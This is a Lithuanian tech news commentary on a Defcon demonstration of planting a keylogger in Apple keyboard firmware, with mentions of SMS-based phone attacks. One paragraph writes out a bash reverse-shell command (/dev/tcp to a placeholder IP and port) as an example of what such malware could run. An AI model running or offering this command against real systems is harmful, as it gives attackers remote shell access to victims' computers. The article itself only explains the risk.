„NetBSD“ operacinės sistemos autoriai yra susigalvoję skambų šūkį - „Of course it runs NetBSD“. Anot jų, ši operacinė sistema gali veikti netgi duonos skrudintuve ir kažkas tai sėkmingai įrodė, parodoje pademonstravęs skrudintuvą su „NetBSD“ operacine sistema. Tačiau tai buvo tik pokštas, siekiant pademonstruoti sistemos galimybes.
O štai „Defcon“ saugumo konferencijoje dalyvavęs specialistas, prisistatęs K. Chenu, nusprendė papokštauti šia tema rimtai ir pademonstravo įsilaužimo į klaviatūrą galimybę. K. Chenas sugebėjo, ne šiaip sau įsilaužti, o įdiegti į pačią klaviatūrą šnipinėjimo programą. Nors tai skamba nelabai įtikinamai, tačiau tokia galimybė yra, nes „Apple“ kompiuterių klaviatūrayra gana sudėtingas kompiuterinis įrenginys, turintis savą 8 KB pastoviąją atmintinę bei 256 baitų operatyviąją atmintinę.
Dabartinės pelės ir klaviatūros yra žmogiškosios sąsajos įrenginiai, kuriuos galima programuoti ar bent jau keisti jų parametrus. Norėdama išplėsti savo gaminių funkcionalumą, „Apple“ numatė galimybę atnaujinti kalviatūros aparatinę programinę įrangą - „Firmware“, kuo ir nusprendė pasinaudoti K. Chenas.
Nors daugeliui skaitytojų tai turbūt atrodo nerealiai maži skaičiai, tačiau K. Chenas matomai yra senesnės kompiuterininkų kartos atstovas, nepamiršęs, kaip reikia rašyti efektyvias programas. Pirmasis komercinis asmeninis kompiuteris „MITS Altair“ taip pat turėjo tik 256 baitus atmintinės ir 2 Mhz „Intel 8080“ procesorių.
Taigi, kaip rašoma „3D News“, „Semiaccurate“ ir kitose svetainėse, K. Chenas, pasinaudojęs „Apple“ sukurta aparatinės programinės įrangos atnaujinimo funkcija, į klaviatūrą įrašė savo programinį kodą, leidžiantį parodyti, kas buvo paskutiniu metu rašoma klaviatūra. Kaip nurodoma naujienose, jam liko maždaug 1 KB atmintinės, o tai 1024 simboliai, kurios toks „Trojos arklys“ gali įrašyti niekam nieko nežinant. Tačiau toks kenkėjiškas kodas gali padaryti ir daugiau eibių, pavyzdžiui, pasinaudoti plačiomis „Unix“ šeimos galimybėmis dirbti tinklu ir įvykdžius „exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0“ komandą, prijungti aukos kompiuterį prie įsilaužėlio.
Pagrindinė problema ta, kad tokio kenkėjo neatsikratysi jokia antivirusine programa ar pakartotiniu sistemos įdiegimu. Kaip pastebi naujienų autoriai, tai yra tikrai sunku, negalint valdyti savo klaviatūros. O užkrėsti kenkėju „Apple“ klaviatūrą nėra sunku, nes tam potencialus įsilaužėlis gali pasinaudoti bet kuria iš žinomų „OS X“ ar šios operacinės sistemos programų spraga.
Tokia saugumo spraga akivaizdžiai parodo, kad nėra iš principo saugių išmoningųjų įrenginių. Jei įrenginys turi programinės įrangos atnaujinimo galimybę, tai tinkamai nepasirūpinus jo saugumu - visuomet atsiras gudragalvių, kurie sugalvos, kai panaudoti tuos įrenginius ne pagal paskirtį. Ir nebūtinai tai turi būti geras „hack'as“, kaip, pavyzdžiui, „Nintendo DS Homebrew“ ar „Commodore C64“ pritaikymas internetui.
Todėl tokio pobūdžio spragos gali būti aptiktos ir kituose įrenginiuose bei paslaugose. Pavyzdžiui, visų seniau naudojamos SMS žinutės taip pat gali būti pavojingos, jei telefono programinė jas apdoroja netinkamai arba GSM ryšio tinklas buvo suprojektuotas negalvojant apie saugumą. Šių metų „Defcon“ ir „BlackHat“ konferencijose buvo pademonstruota, kaip SMS žinučių pagalba galima užvaldyti ar perkonfigūruoti kai kuriuos „iPhone“, „Android“ ir „Windows Mobile“ sistemų telefonus.
Reikia pastebėti, kas sistemos „vidurių“ slėpimas ar teisiniai draudimai, kaip bando „Apple“ kompanija, čia nepadės. Tiesiog, kuriant naujas sistemas būtina išsyk gerai pagalvoti apie jų saugumą. Žinoma, tai gali padidinti gaminių kainą, tačiau ilgalaikėje perspektyvoj, tai bus pigiau, nei nuolat kariauti su pastoviomis saugumo problemomis. Žinoma, galima čia įžvelgti ir kitą poziciją. Rinkai reikia greitai ir pigiai. Tokių mūsų poreikių rezultatus mes akivaizdžiai matome. O paskui prisipirkus pigiai, tenka brangiai remti vienas ar kitas kompiuterinio saugumo kompanijas. Žinoma, „Symantec“,„McAfee“, CA ir kitos panašios kompanijos tuo tikrai nesiskundžia... 